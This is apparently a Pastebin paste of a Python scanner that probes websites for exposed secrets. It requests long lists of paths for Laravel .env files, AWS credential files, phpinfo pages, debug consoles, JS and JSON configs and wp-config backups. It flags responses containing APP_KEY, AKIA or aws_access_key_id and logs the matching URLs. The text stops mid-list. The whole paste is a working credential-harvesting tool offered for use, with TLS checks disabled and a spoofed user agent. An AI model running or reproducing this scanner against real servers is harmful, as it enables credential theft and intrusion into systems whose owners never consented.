API tools faq
paste
JamesBops

Untitled

JamesBops
Nov 22nd, 2023
84
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.81 KB | None | 0 0
raw download clone embed print report
  1. # getting aws and dll from env
  2. import multiprocessing as mp
  3. import re
  4. import ast
  5. import os
  6. import sys
  7. import requests
  8. from urllib3.exceptions import InsecureRequestWarning
  9. import json
  10. from functools import partial
  11.  
  12. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  13.  
  14. try:
  15. regConfig = ast.literal_eval(open('settings.json').read())
  16. except FileNotFoundError:
  17. print('File settings.json not found')
  18. sys.exit()
  19.  
  20. session = requests.Session()
  21. session.headers.update(
  22. {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'})
  23.  
  24.  
  25. class Parse:
  26.  
  27. def __init__(self, text, url, method):
  28. self.text = text
  29. self.url = url
  30. self.method = method
  31.  
  32. def parse(self, foldersave):
  33. for key, value in regConfig.items():
  34. if re.search(value[1], self.text):
  35. print(self.url + ' -> FOUND ' + value[0])
  36. with open(foldersave + '/' + self.method + key, 'a') as f:
  37. f.write(self.url + '\n')
  38. f.close()
  39.  
  40.  
  41. def is_json(myjson):
  42. try:
  43. json.loads(myjson)
  44. return True
  45. except:
  46. return False
  47.  
  48.  
  49. class Main:
  50. def __init__(self, url, folder):
  51. self.url = url
  52. self.folder = folder
  53.  
  54. def saveTofile(self, filename, text, url, method=''):
  55. with open(self.folder + '/' + filename, 'a') as f:
  56. f.write(url + '\n')
  57. Parse(text, url, method).parse(self.folder)
  58.  
  59. def rebuild_url(self, path):
  60. if self.url[-1] == '/':
  61. return self.url + path
  62. else:
  63. return self.url + '/' + path
  64.  
  65. def debug(self):
  66. method = 'debug_'
  67. url_ = self.url
  68. try:
  69. resp = session.post(
  70. url_, data={1: 1}, timeout=10, verify=False).text
  71. if 'APP_KEY' in resp:
  72. print(self.url + ' -> FOUND LARAVEL DEBUG')
  73. self.saveTofile('laravel_debug.txt', resp, url_, method)
  74. else:
  75. print(self.url + ' -> NOT FOUND LARAVEL DEBUG')
  76. except:
  77. pass
  78.  
  79. def env(self):
  80. list_env = ['.env.bak', '.env', 'config.env', '.env.dist', '.env.dev', '.env.local', 'public/.env', 'laravel/.env', 'laravel/core/.env', 'beta/.env', 'kyc/.env', 'admin/.env', 'prod/.env', '.env.backup', '.env.docker.dev', '.env.php', '.env.prod', '.env.production.local', '.env.sample.php', '.env.save', '.env.stage', '.env.test', '.env.test.local', '.env.local', '.env.production', '.env.staging', 'backup/.env', 'backup/.env.local', 'backup/.env.production', 'backup/.env.staging', 'public/.env', 'public/.env.local', 'public/.env.production', 'public/.env.staging', 'laravel/.env', 'laravel/.env.local', 'laravel/.env.production', 'laravel/.env.staging', 'laravel/core/.env', 'laravel/core/.env.local', 'laravel/core/.env.production', 'laravel/core/.env.staging', 'beta/.env', 'beta/.env.local', 'beta/.env.production', 'beta/.env.staging', 'live/.env', 'live/.env.local', 'live/.env.production', 'live/.env.staging', 'demo/.env', 'demo/.env.local', 'demo/.env.production', 'demo/.env.staging', 'test/.env', 'test/.env.local', 'test/.env.production', 'test/.env.staging', 'kyc/.env', 'kyc/.env.local', 'kyc/.env.production', 'kyc/.env.staging', 'admin/.env', 'admin/.env.local', 'admin/.env.production', 'admin/.env.staging', 'client/.env', 'client/.env.local', 'client/.env.production', 'client/.env.staging', 'user/.env', 'user/.env.local', 'user/.env.staging', 'api/.env', 'api/.env.local', 'api/.env.staging', 'api/.env.production', 'apis/.env', 'apis/.env.local', 'apis/.env.staging', 'apis/.env.production', 'backend/.env', 'backend/.env.local', 'backend/.env.staging', 'backend/.env.production', 'server/.env', 'server/.env.local', 'server/.env.staging', 'server/.env.production', 'app/.env', 'app/.env.local', 'app/.env.staging', 'app/.env.production', 'project/.env', 'project/.env.local', 'project/.env.staging', 'project/.env.production', 'cron/.env', 'cron/.env.local', 'cron/.env.staging', 'cron/.env.production', 'crm/.env', 'crm/.env.local', 'crm/.env.staging', 'crm/.env.production', 'current/.env', 'current/.env.local', 'current/.env.staging', 'current/.env.production', 'dev/.env', 'dev/.env.local', 'dev/.env.staging', 'dev/.env.production', 'develop/.env', 'develop/.env.local', 'develop/.env.staging', 'develop/.env.production', 'development/.env', 'development/.env.local', 'development/.env.staging', 'development/.env.production', 'prod/.env', 'prod/.env.local', 'prod/.env.staging', 'prod/.env.production', 'product/.env', 'product/.env.local', 'product/.env.staging', 'product/.env.production', 'production/.env', 'production/.env.local', 'production/.env.staging', 'production/.env.production', 'portal/.env', 'portal/.env.local', 'portal/.env.staging', 'portal/.env.production', 'qa/.env', 'qa/.env.local', 'qa/.env.staging', 'qa/.env.production', 'stg/.env', 'stg/.env.local', 'stg/.env.staging', 'stg/.env.production', 'staging/.env', 'staging/.env.local', 'staging/.env.staging', 'staging/.env.production', 'service/.env', 'service/.env.local', 'service/.env.staging', 'service/.env.production', 'services/.env', 'services/.env.local', 'services/.env.staging', 'services/.env.production', 'storage/.env', 'storage/.env.local', 'storage/.env.staging', 'storage/.env.production', 'old/.env', 'old/.env.local', 'old/.env.staging', 'old/.env.production', 'new/.env', 'new/.env.local', 'new/.env.staging', 'new/.env.production', 'web/.env', 'web/.env.local', 'web/.env.staging', 'web/.env.production', 'website/.env', 'website/.env.local', 'website/.env.staging', 'website/.env.production', 'market/.env', 'market/.env.local', 'market/.env.staging', 'market/.env.production', 'marketing/.env', 'marketing/.env.local', 'marketing/.env.staging', 'marketing/.env.production', 'shop/.env', 'shop/.env.local', 'shop/.env.staging', 'shop/.env.production', 'public_html/.env', 'public_html/.env.local', 'public_html/.env.staging', 'public_html/.env.production', 'xampp/.env', 'xampp/.env.local', 'xampp/.env.staging', 'xampp/.env.production',
  81. 'api/.env', '.docker/.env', '.docker/laravel/app/.env', 'env.backup', '.environment', '.envrc', '.envs', '.env~', '.gitlab-ci/.env', '.vscode/.env', 'mailer/.env', 'twitter/.env', '.env.development.local', '.env', '.env.local', '.env.production', '.env.staging', 'backup/.env', 'public/.env', 'laravel/.env', 'config.env', 'config/.env', 'beta/.env', 'live/.env', 'lms/.env', 'demo/.env', 'test/.env', 'kyc/.env', 'admin/.env', 'client/.env', 'user/.env', 'usr/.env', 'api/.env', 'apis/.env', 'back/.env', 'backend/.env', 'front/.env', 'frontend/.env', 'server/.env', 'app/.env', 'apps/.env', 'application/.env', 'project/.env', 'cron/.env', 'current/.env', 'dev/.env', 'develop/.env', 'development/.env', 'prod/.env', 'product/.env', 'production/.env', 'portal/.env', 'stg/.env', 'staging/.env', 'service/.env', 'services/.env', 'storage/.env', 'old/.env', 'new/.env', 'web/.env', 'website/.env', 'market/.env', 'marketing/.env', 'media/.env', 'node/.env', 'nodeapi/.env', 'nodeweb/.env', 'shop/.env', 'public_html/.env', 'xampp/.env', 'API/.env', 'APP/.env', 'BACK/.env', 'BACKEND/.env', 'FRONT/.env', 'FRONTEND/.env', 'properties.ini', 'settings.py' ]
  82. for path in list_env:
  83. url_ = self.rebuild_url(path)
  84. try:
  85. resp = session.get(url_, timeout=10, verify=False).text
  86. if 'APP_KEY' in resp:
  87. print(self.url + ' -> FOUND LARAVEL ENV')
  88. self.saveTofile('laravel_env.txt', resp, url_)
  89. break
  90. else:
  91. if path == list_env[-1]:
  92. print(self.url + ' -> NOT FOUND LARAVEL ENV')
  93. except:
  94. pass
  95.  
  96. def symfony(self):
  97. url_ = self.rebuild_url('frontend_dev.php/$')
  98. try:
  99. resp = session.get(url_, timeout=10, verify=False).text
  100. if 'sf_app' in resp:
  101. print(self.url + ' -> FOUND SYMFONY DEBUG')
  102. self.saveTofile('symfony_debug.txt', resp, url_)
  103. else:
  104. print(self.url + ' -> NOT FOUND SYMFONY DEBUG')
  105. except:
  106. pass
  107.  
  108. def aws(self):
  109. configAws = ['.aws/credentials', '.s3cfg', '.msmtprc']
  110. for path in configAws:
  111. url_ = self.rebuild_url(path)
  112. try:
  113. resp = session.get(url_, timeout=10, verify=False, allow_redirects=False).text
  114. if 'AKIA' in resp or re.search('aws_access_key_id', resp, re.IGNORECASE):
  115. print(self.url + ' -> FOUND AWS')
  116. self.saveTofile('aws_credentials.txt', resp, url_)
  117. break
  118. else:
  119. if path == configAws[-1]:
  120. print(self.url + ' -> NOT FOUND AWS')
  121. except:
  122. pass
  123.  
  124. def yii(self):
  125. url_ = self.rebuild_url('debug/default/view?panel=config')
  126. try:
  127. resp = session.get(url_, timeout=10, verify=False).text
  128. if 'Yii Debugger' in resp:
  129. print(self.url + ' -> FOUND YII DEBUGGER')
  130. self.saveTofile('yii_debug.txt', resp, url_)
  131. else:
  132. print(self.url + ' -> NOT FOUND YII DEBUGGER')
  133. except:
  134. pass
  135.  
  136. def phpinfo(self):
  137. phpinfoPathlist = ['xampp/info.php', 'xampp/phpinfo', '_profiler/phpinfo', 'phpinfo.php', 'phpinfo', 'info.php', 'php.ini', 'php.php', 'infophp.php', 'test.php', 'dashboard/phpinfo.php', '/api/phpinfo.php', '/backend/phpinfo.php', '/backup/phpinfo.php', '/crm/phpinfo.php', '/current/phpinfo.php', '/dev/phpinfo.php', '/develop/phpinfo.php', '/development/phpinfo.php', '/help/phpinfo.php', '/helper/phpinfo.php', '/lara/phpinfo.php', '/laravel/phpinfo.php', '/server/phpinfo.php', '/service/phpinfo.php', '/services/phpinfo.php', '/xampp/phpinfo.php', '/phpinfo', '/info.php', '/api/info.php', '/backend/info.php', '/backup/info.php', '/crm/info.php', '/current/info.php', '/dev/info.php', '/develop/info.php', '/development/iinfo.php', '/help/info.php', '/helper/info.php', '/lara/info.php', '/laravel/info.php', '/server/info.php', '/service/info.php', '/services/info.php', '/xampp/info.php',
  138. 'php-info.php', 'linusadmin-phpinfo.php', 'infos.php', 'old_phpinfo.php', 'temp.php', 'time.php', 'phpversion.php', 'pinfo.php', 'i.php', 'asdf.php']
  139. for path in phpinfoPathlist:
  140. url_ = self.rebuild_url(path)
  141. try:
  142. resp = session.get(url_, timeout=10, verify=False).text
  143. if 'PHP Variables' in resp and 'Environment' in resp:
  144. print(self.url + ' -> FOUND PHPINFO')
  145. self.saveTofile('phpinfo.txt', resp, url_)
  146. break
  147. else:
  148. if path == phpinfoPathlist[-1]:
  149. print(self.url + ' -> NOT FOUND PHPINFO')
  150. except:
  151. pass
  152.  
  153. def config_json(self):
  154. configjsonPathlist = ['index.json', 'config.json', 'config/config.json', 'info.json', '.config/gatsby/config.json', '.cordova/config.json', '.deployment-config.json', '.docker/config.json', '.docker/daemon.json',
  155. '.jupyter/jupyter_notebook_config.json', '.lanproxy/config.json', '_wpeprivate/config.json', 'console/base/config.json', 'console/payments/config.json', 'server/config.json']
  156. for path in configjsonPathlist:
  157. url_ = self.rebuild_url(path)
  158. try:
  159. resp = session.get(url_, timeout=10, verify=False).text
  160. if is_json(resp):
  161. print(self.url + ' -> FOUND JSON CONFIG')
  162. self.saveTofile('json_config.txt', resp, url_)
  163. break
  164. else:
  165. if path == configjsonPathlist[-1]:
  166. print(self.url + ' -> NOT FOUND JSON CONFIG')
  167. except:
  168. pass
  169.  
  170. def config_js(self):
  171. configjsPathlist = ['index.js', 'config.js', 'config/config.js', 'app.js', 'config.js', 'constant.js', 'constants.js', 'controller.js', 'helper.js', 'index.js', 'mail.js', 'mailer.js', 'mailserver.js', 'server.js', 'utils.js', 'admin/app.js', 'admin/constant.js', 'admin/constants.js', 'admin/controller.js', 'admin/helper.js', 'admin/index.js', 'admin/mail.js', 'admin/mailer.js', 'admin/mailserver.js', 'admin/server.js', 'admin/utils.js', 'admin/config/common.js', 'admin/config/constants.js', 'admin/config/database.js', 'admin/config/template.js', 'api/app.js', 'api/config.js', 'api/constant.js', 'api/constants.js', 'api/controller.js', 'api/helper.js', 'api/index.js', 'api/mail.js', 'api/mailer.js', 'api/mailserver.js', 'api/server.js', 'api/utils.js', 'api/controller.js', 'api/config/common.js', 'api/config/constants.js', 'api/config/database.js', 'api/config/template.js', 'backend/app.js', 'backend/config.js', 'backend/constant.js', 'backend/constants.js', 'backend/controller.js', 'backend/helper.js', 'backend/index.js', 'backend/mail.js', 'backend/mailer.js', 'backend/mailserver.js', 'backend/server.js', 'backend/utils.js', 'backend/config/common.js', 'backend/config/constants.js', 'backend/config/database.js', 'backend/config/template.js', 'config/app.js', 'config/config.js', 'config/constant.js', 'config/constants.js', 'config/controller.js', 'config/helper.js', 'config/index.js', 'config/mail.js', 'config/mailer.js', 'config/mailserver.js', 'config/server.js', 'config/utils.js', 'config/common.js', 'config/database.js', 'config/template.js', 'dev/app.js', 'dev/config.js', 'dev/constant.js', 'dev/constants.js', 'dev/controller.js', 'dev/helper.js', 'dev/index.js', 'dev/mail.js', 'dev/mailer.js', 'dev/mailserver.js', 'dev/server.js', 'dev/utils.js', 'dev/config/common.js', 'dev/config/constants.js', 'dev/config/database.js', 'dev/config/template.js', 'src/app.js', 'src/src.js', 'src/constant.js', 'src/constants.js', 'src/controller.js', 'src/helper.js', 'src/index.js', 'src/mail.js', 'src/mailer.js', 'src/mailserver.js', 'src/server.js', 'src/utils.js', 'src/config/common.js', 'src/config/constants.js', 'src/config/database.js', 'src/config/template.js', 'server/app.js', 'server/server.js', 'server/constant.js', 'server/constants.js', 'server/controller.js', 'server/helper.js', 'server/index.js', 'server/mail.js', 'server/mailer.js', 'server/mailserver.js', 'server/server.js', 'server/utils.js', 'server/config/common.js', 'server/config/constants.js', 'server/config/database.js', 'server/config/template.js', 'web/app.js', 'web/web.js', 'web/constant.js', 'web/constants.js', 'web/controller.js', 'web/helper.js', 'web/index.js', 'web/mail.js', 'web/mailer.js', 'web/mailserver.js', 'web/server.js', 'web/utils.js', 'web/config/common.js', 'web/config/constants.js', 'web/config/database.js', 'web/config/template.js', 'api/common.js', 'api/config/common.js', 'API/common.js', 'API/config/common.js', 'server/helper/aws_s3.js'
  172. 'js/config.js', 'js/envConfig.js', 'env.config.js', 'env.js', 'config/settings.py', 'properties.ini', '/rista/properties.ini']
  173. for path in configjsPathlist:
  174. url_ = self.rebuild_url(path)
  175. try:
  176. resp = session.get(url_, timeout=10, verify=False)
  177. if 'javascript' in str(resp.headers):
  178. print(self.url + ' -> FOUND JS CONFIG')
  179. self.saveTofile('js_config.txt', resp.text, url_)
  180. break
  181. else:
  182. if path == configjsPathlist[-1]:
  183. print(self.url + ' -> NOT FOUND JS CONFIG')
  184. except:
  185. pass
  186.  
  187. def config_php(self):
  188. configphpPathlist = ['wp-config.php.bak', 'wp-config.php.old', 'wp-config.php-backup', '.wp-config.php.swo', 'wp-config.php.swp', '.wp-config.swp', '#wp-config.php#', 'backup.wp-config.php', 'wp-config', 'wp-config - Copy.php', 'wp-config copy.php', 'wp-config_backup', 'wp-config_good', 'wp-config-backup', 'wp-config-backup.php', 'wp-config-backup.txt', 'wp-config-backup1.txt', 'wp-config-good', 'wp-config-sample.php', 'wp-config-sample.php.bak', 'wp-config-sample.php~', 'wp-config.backup', 'wp-config.bak', 'wp-config.bkp', 'wp-config.cfg', 'wp-config.conf', 'wp-config.data', 'wp-config.dump', 'wp-config.good', 'wp-config.htm', 'wp-config.html', 'wp-config.inc', 'wp-config.local.php', 'wp-config.old', 'wp-config.old.old', 'wp-config.ORG', 'wp-config.orig', 'wp-config.original', 'wp-config.php', 'wp-config.php_', 'wp-config.php__', 'wp-config.php______', 'wp-config.php__olds', 'wp-config.php_1', 'wp-config.php_backup', 'wp-config.php_bak', 'wp-config.php_bk', 'wp-config.php_new', 'wp-config.php_old', 'wp-config.php_old2017', 'wp-config.php_old2018', 'wp-config.php_old2019', 'wp-config.php_old2020', 'wp-config.php_orig', 'wp-config.php_original', 'wp-config.php-', 'wp-config.php-backup', 'wp-config.php-bak', 'wp-config.php-n', 'wp-config.php-o', 'wp-config.php-old', 'wp-config.php-original', 'wp-config.php-save', 'wp-config.php-work', 'wp-config.php.0', 'wp-config.php.1', 'wp-config.php.2', 'wp-config.php.3', 'wp-config.php.4', 'wp-config.php.5', 'wp-config.php.6', 'wp-config.php.7', 'wp-config.php.8', 'wp-config.php.9', 'wp-config.php.a', 'wp-config.php.aws', 'wp-config.php.azure', 'wp-config.php.b', 'wp-config.php.backup', 'wp-config.php.backup.txt', 'wp-config.php.bak', 'wp-config.php.bak1', 'wp-config.php.bk', 'wp-config.php.bkp', 'wp-config.php.c', 'wp-config.php.com', 'wp-config.php.cust', 'wp-config.php.dev', 'wp-config.php.disabled', 'wp-config.php.dist', 'wp-config.php.dump', 'wp-config.php.html', 'wp-config.php.in', 'wp-config.php.inc', 'wp-config.php.local', 'wp-config.php.maj', 'wp-config.php.new', 'wp-config.php.old', 'wp-config.php.org', 'wp-config.php.orig', 'wp-config.php.original', 'wp-config.php.php-bak', 'wp-config.php.prod', 'wp-config.php.production', 'wp-config.php.sample', 'wp-config.php.save', 'wp-config.php.save.1', 'wp-config.php.stage', 'wp-config.php.staging', 'wp-config.php.swn', 'wp-config.php.swo', 'wp-config.php.swp', 'wp-config.php.tar', 'wp-config.php.temp', 'wp-config.php.tmp', 'wp-config.php.txt', 'wp-config.php.uk', 'wp-config.php.us', 'wp-config.php=', 'wp-config.php~', 'wp-config.php~~~', 'wp-config.php1', 'wp-config.phpa', 'wp-config.phpb', 'wp-config.phpbak', 'wp-config.phpc', 'wp-config.phpd', 'wp-config.phpn', 'wp-config.phpnew', 'wp-config.phpold', 'wp-config.phporiginal', 'wp-config.phptmp', 'wp-config.prod.php.txt', 'wp-config.save', 'wp-config.tar', 'wp-config.temp', 'wp-config.txt', 'wp-config.zip', 'wp-config~', 'wp-configbak', 'admin/wp-config.php.bak', 'admin/wp-config.php.old', 'admin/wp-config.php-backup', '.admin/wp-config.php.swo', 'admin/wp-config.php.sadmin/wp', '.admin/wp-config.sadmin/wp', '#admin/wp-config.php#', 'backup.admin/wp-config.php', 'admin/wp-config', 'admin/wp-config - Copy.php', 'admin/wp-config copy.php', 'admin/wp-config_backup', 'admin/wp-config_good', 'admin/wp-config-backup', 'admin/wp-config-backup.php', 'admin/wp-config-backup.txt', 'admin/wp-config-backup1.txt', 'admin/wp-config-good', 'admin/wp-config-sample.php', 'admin/wp-config-sample.php.bak', 'admin/wp-config-sample.php~', 'admin/wp-config.backup', 'admin/wp-config.bak', 'admin/wp-config.bkp', 'admin/wp-config.cfg', 'admin/wp-config.conf', 'admin/wp-config.data', 'admin/wp-config.dump', 'admin/wp-config.good', 'admin/wp-config.htm', 'admin/wp-config.html', 'admin/wp-config.inc', 'admin/wp-config.local.php', 'admin/wp-config.old', 'admin/wp-config.old.old', 'admin/wp-config.ORG', 'admin/wp-config.orig', 'admin/wp-config.original', 'admin/wp-config.php', 'admin/wp-config.php_', 'admin/wp-config.php__', 'admin/wp-config.php______', 'admin/wp-config.php__olds', 'admin/wp-config.php_1', 'admin/wp-config.php_backup', 'admin/wp-config.php_bak', 'admin/wp-config.php_bk', 'admin/wp-config.php_new', 'admin/wp-config.php_old', 'admin/wp-config.php_old2017', 'admin/wp-config.php_old2018', 'admin/wp-config.php_old2019', 'admin/wp-config.php_old2020', 'admin/wp-config.php_orig', 'admin/wp-config.php_original', 'admin/wp-config.php-', 'admin/wp-config.php-backup', 'admin/wp-config.php-bak', 'admin/wp-config.php-n', 'admin/wp-config.php-o', 'admin/wp-config.php-old', 'admin/wp-config.php-original', 'admin/wp-config.php-save', 'admin/wp-config.php-work', 'admin/wp-config.php.0', 'admin/wp-config.php.1', 'admin/wp-config.php.2', 'admin/wp-config.php.3', 'admin/wp-config.php.4', 'admin/wp-config.php.5', 'admin/wp-config.php.6', 'admin/wp-config.php.7', 'admin/wp-config.php.8', 'admin/wp-config.php.9', 'admin/wp-config.php.a', 'admin/wp-config.php.aws', 'admin/wp-config.php.azure', 'admin/wp-config.php.b', 'admin/wp-config.php.backup', 'admin/wp-config.php.backup.txt', 'admin/wp-config.php.bak', 'admin/wp-config.php.bak1', 'admin/wp-config.php.bk', 'admin/wp-config.php.bkp', 'admin/wp-config.php.c', 'admin/wp-config.php.com', 'admin/wp-config.php.cust', 'admin/wp-config.php.dev', 'admin/wp-config.php.disabled', 'admin/wp-config.php.dist', 'admin/wp-config.php.dump', 'admin/wp-config.php.html', 'admin/wp-config.php.in', 'admin/wp-config.php.inc', 'admin/wp-config.php.local', 'admin/wp-config.php.maj', 'admin/wp-config.php.new', 'admin/wp-config.php.old', 'admin/wp-config.php.org', 'admin/wp-config.php.orig', 'admin/wp-config.php.original', 'admin/wp-config.php.php-bak', 'admin/wp-config.php.prod', 'admin/wp-config.php.production', 'admin/wp-config.php.sample', 'admin/wp-config.php.save', 'admin/wp-config.php.save.1', 'admin/wp-config.php.stage', 'admin/wp-config.php.staging', 'admin/wp-config.php.swn', 'admin/wp-config.php.swo', 'admin/wp-config.php.sadmin/wp', 'admin/wp-config.php.tar', 'admin/wp-config.php.temp', 'admin/wp-config.php.tmp', 'admin/wp-config.php.txt', 'admin/wp-config.php.uk', 'admin/wp-config.php.us', 'admin/wp-config.php=', 'admin/wp-config.php~', 'admin/wp-config.php~~~', 'admin/wp-config.php1', 'admin/wp-config.phpa', 'admin/wp-config.phpb', 'admin/wp-config.phpbak', 'admin/wp-config.phpc', 'admin/wp-config.phpd', 'admin/wp-config.phpn', 'admin/wp-config.phpnew', 'admin/wp-config.phpold', 'admin/wp-config.phporiginal', 'admin/wp-config.phptmp', 'admin/wp-config.prod.php.txt', 'admin/wp-config.save', 'admin/wp-config.tar', 'admin/wp-config.temp', 'admin/wp-config.txt', 'admin/wp-config.zip', 'admin/wp-config~', 'admin/wp-configbak', 'wp-config.php.sav', 'wp-config.php.copy', 'wp-config.php.tmp', 'wp-config.php.txt', 'wp-config.php.back', 'wp-config.php.zip', 'wp-config.php.test', 'wp-config.php.tgz', 'wp-config.php.temp', 'wp-config.php.tar.gz', 'wp-config.php.bakup', 'wp-config.php.war', 'wp-config.php.tar', 'wp-config.php.saved', 'wp-config.php.sav', 'wp-config.php.pas', 'wp-config.php.ini', 'wp-config.php.jar', 'wp-config.php.default', 'wp-config.php.db', 'wp-config.php.dat', 'wp-config.php.core', 'wp-config.php.conf',
  189. 'wp/wp-config.php.bak', 'wp/wp-config.php.old', 'wp/wp-config.php-backup', '.wp/wp-config.php.swo', 'wp/wp-config.php.swp/wp', '.wp/wp-config.swp/wp', '#wp/wp-config.php#', 'backup.wp/wp-config.php', 'wp/wp-config', 'wp/wp-config - Copy.php', 'wp/wp-config copy.php', 'wp/wp-config_backup', 'wp/wp-config_good', 'wp/wp-config-backup', 'wp/wp-config-backup.php', 'wp/wp-config-backup.txt', 'wp/wp-config-backup1.txt', 'wp/wp-config-good', 'wp/wp-config-sample.php', 'wp/wp-config-sample.php.bak', 'wp/wp-config-sample.php~', 'wp/wp-config.backup', 'wp/wp-config.bak', 'wp/wp-config.bkp', 'wp/wp-config.cfg', 'wp/wp-config.conf', 'wp/wp-config.data', 'wp/wp-config.dump', 'wp/wp-config.good', 'wp/wp-config.htm', 'wp/wp-config.html', 'wp/wp-config.inc', 'wp/wp-config.local.php', 'wp/wp-config.old', 'wp/wp-config.old.old', 'wp/wp-config.ORG', 'wp/wp-config.orig', 'wp/wp-config.original', 'wp/wp-config.php', 'wp/wp-config.php_', 'wp/wp-config.php__', 'wp/wp-config.php______', 'wp/wp-config.php__olds', 'wp/wp-config.php_1', 'wp/wp-config.php_backup', 'wp/wp-config.php_bak', 'wp/wp-config.php_bk', 'wp/wp-config.php_new', 'wp/wp-config.php_old', 'wp/wp-config.php_old2017', 'wp/wp-config.php_old2018', 'wp/wp-config.php_old2019', 'wp/wp-config.php_old2020', 'wp/wp-config.php_orig', 'wp/wp-config.php_original', 'wp/wp-config.php-', 'wp/wp-config.php-backup', 'wp/wp-config.php-bak', 'wp/wp-config.php-n', 'wp/wp-config.php-o', 'wp/wp-config.php-old', 'wp/wp-config.php-original', 'wp/wp-config.php-save', 'wp/wp-config.php-work', 'wp/wp-config.php.0', 'wp/wp-config.php.1', 'wp/wp-config.php.2', 'wp/wp-config.php.3', 'wp/wp-config.php.4', 'wp/wp-config.php.5', 'wp/wp-config.php.6', 'wp/wp-config.php.7', 'wp/wp-config.php.8', 'wp/wp-config.php.9', 'wp/wp-config.php.a', 'wp/wp-config.php.aws', 'wp/wp-config.php.azure', 'wp/wp-config.php.b', 'wp/wp-config.php.backup', 'wp/wp-config.php.backup.txt', 'wp/wp-config.php.bak', 'wp/wp-config.php.bak1', 'wp/wp-config.php.bk', 'wp/wp-config.php.bkp', 'wp/wp-config.php.c', 'wp/wp-config.php.com', 'wp/wp-config.php.cust', 'wp/wp-config.php.dev', 'wp/wp-config.php.disabled', 'wp/wp-config.php.dist', 'wp/wp-config.php.dump', 'wp/wp-config.php.html', 'wp/wp-config.php.in', 'wp/wp-config.php.inc', 'wp/wp-config.php.local', 'wp/wp-config.php.maj', 'wp/wp-config.php.new', 'wp/wp-config.php.old', 'wp/wp-config.php.org', 'wp/wp-config.php.orig', 'wp/wp-config.php.original', 'wp/wp-config.php.php-bak', 'wp/wp-config.php.prod', 'wp/wp-config.php.production', 'wp/wp-config.php.sample', 'wp/wp-config.php.save', 'wp/wp-config.php.save.1', 'wp/wp-config.php.stage', 'wp/wp-config.php.staging', 'wp/wp-config.php.swn', 'wp/wp-config.php.swo', 'wp/wp-config.php.swp/wp', 'wp/wp-config.php.tar', 'wp/wp-config.php.temp', 'wp/wp-config.php.tmp', 'wp/wp-config.php.txt', 'wp/wp-config.php.uk', 'wp/wp-config.php.us', 'wp/wp-config.php=', 'wp/wp-config.php~', 'wp/wp-config.php~~~', 'wp/wp-config.php1', 'wp/wp-config.phpa', 'wp/wp-config.phpb', 'wp/wp-config.phpbak', 'wp/wp-config.phpc', 'wp/wp-config.phpd', 'wp/wp-config.phpn', 'wp/wp-config.phpnew', 'wp/wp-config.phpold', 'wp/wp-config.phporiginal', 'wp/wp-config.phptmp', 'wp/wp-config.prod.php.txt', 'wp/wp-config.save', 'wp/wp-config.tar', 'wp/wp-config.temp', 'wp/wp-config.txt', 'wp/wp-config.zip', 'wp/wp-config~', 'wp/wp-configbak', 'wordpress/wp-config.php.bak', 'wordpress/wp-config.php.old', 'wordpress/wp-config.php-backup', '.wordpress/wp-config.php.swo', 'wordpress/wp-config.php.swordpress/wp', '.wordpress/wp-config.swordpress/wp', '#wordpress/wp-config.php#', 'backup.wordpress/wp-config.php', 'wordpress/wp-config', 'wordpress/wp-config - Copy.php', 'wordpress/wp-config copy.php', 'wordpress/wp-config_backup', 'wordpress/wp-config_good', 'wordpress/wp-config-backup', 'wordpress/wp-config-backup.php', 'wordpress/wp-config-backup.txt', 'wordpress/wp-config-backup1.txt', 'wordpress/wp-config-good', 'wordpress/wp-config-sample.php', 'wordpress/wp-config-sample.php.bak', 'wordpress/wp-config-sample.php~', 'wordpress/wp-config.backup', 'wordpress/wp-config.bak', 'wordpress/wp-config.bkp', 'wordpress/wp-config.cfg', 'wordpress/wp-config.conf', 'wordpress/wp-config.data', 'wordpress/wp-config.dump', 'wordpress/wp-config.good', 'wordpress/wp-config.htm', 'wordpress/wp-config.html', 'wordpress/wp-config.inc', 'wordpress/wp-config.local.php', 'wordpress/wp-config.old', 'wordpress/wp-config.old.old', 'wordpress/wp-config.ORG', 'wordpress/wp-config.orig', 'wordpress/wp-config.original', 'wordpress/wp-config.php', 'wordpress/wp-config.php_', 'wordpress/wp-config.php__', 'wordpress/wp-config.php______', 'wordpress/wp-config.php__olds', 'wordpress/wp-config.php_1', 'wordpress/wp-config.php_backup', 'wordpress/wp-config.php_bak', 'wordpress/wp-config.php_bk', 'wordpress/wp-config.php_new', 'wordpress/wp-config.php_old', 'wordpress/wp-config.php_old2017', 'wordpress/wp-config.php_old2018', 'wordpress/wp-config.php_old2019', 'wordpress/wp-config.php_old2020', 'wordpress/wp-config.php_orig', 'wordpress/wp-config.php_original', 'wordpress/wp-config.php-', 'wordpress/wp-config.php-backup', 'wordpress/wp-config.php-bak', 'wordpress/wp-config.php-n', 'wordpress/wp-config.php-o', 'wordpress/wp-config.php-old', 'wordpress/wp-config.php-original', 'wordpress/wp-config.php-save', 'wordpress/wp-config.php-work', 'wordpress/wp-config.php.0', 'wordpress/wp-config.php.1', 'wordpress/wp-config.php.2', 'wordpress/wp-config.php.3', 'wordpress/wp-config.php.4', 'wordpress/wp-config.php.5', 'wordpress/wp-config.php.6', 'wordpress/wp-config.php.7', 'wordpress/wp-config.php.8', 'wordpress/wp-config.php.9', 'wordpress/wp-config.php.a', 'wordpress/wp-config.php.aws', 'wordpress/wp-config.php.azure', 'wordpress/wp-config.php.b', 'wordpress/wp-config.php.backup', 'wordpress/wp-config.php.backup.txt', 'wordpress/wp-config.php.bak', 'wordpress/wp-config.php.bak1', 'wordpress/wp-config.php.bk', 'wordpress/wp-config.php.bkp', 'wordpress/wp-config.php.c', 'wordpress/wp-config.php.com', 'wordpress/wp-config.php.cust', 'wordpress/wp-config.php.dev', 'wordpress/wp-config.php.disabled', 'wordpress/wp-config.php.dist', 'wordpress/wp-config.php.dump', 'wordpress/wp-config.php.html', 'wordpress/wp-config.php.in', 'wordpress/wp-config.php.inc', 'wordpress/wp-config.php.local', 'wordpress/wp-config.php.maj', 'wordpress/wp-config.php.new', 'wordpress/wp-config.php.old', 'wordpress/wp-config.php.org', 'wordpress/wp-config.php.orig', 'wordpress/wp-config.php.original', 'wordpress/wp-config.php.php-bak', 'wordpress/wp-config.php.prod', 'wordpress/wp-config.php.production', 'wordpress/wp-config.php.sample', 'wordpress/wp-config.php.save', 'wordpress/wp-config.php.save.1', 'wordpress/wp-config.php.stage', 